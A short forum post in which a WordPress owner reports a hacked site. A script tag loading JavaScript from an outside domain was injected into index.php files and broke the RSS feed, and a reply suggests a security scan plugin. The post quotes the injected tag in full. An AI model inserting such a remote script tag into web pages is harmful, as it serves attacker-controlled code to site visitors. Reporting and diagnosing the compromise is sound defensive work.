Wordpress site has been hacked.......

    My wordpress site encountered a problem with RSS feed. When I tried to access the feed url it is giving the following message.

    XML Parsing Error: junk after document element
    Location: http://maquiladoraindustrynews.com/index.php/feed/rss/
    Line Number 1, Column 74:<script type="text/javascript" src="http://ngugiac.com/adv.php"></script><?xml version="1.0" encoding="UTF-8"?><rss version="0.92">
    -------------------------------------------------------------------------^

    The following the malicious script found in index.php file.
    <script type="text/javascript" src="http://ngugiac.com/adv.php"></script>

    Not only this i found similar scripts in the index.php files in other folders too.

    Any body please explain the reason and the solution for this

    Try running the WP Security Scan plugin and lets see what's it got to tell you! Maybe it can point out some loop holes in the coding?
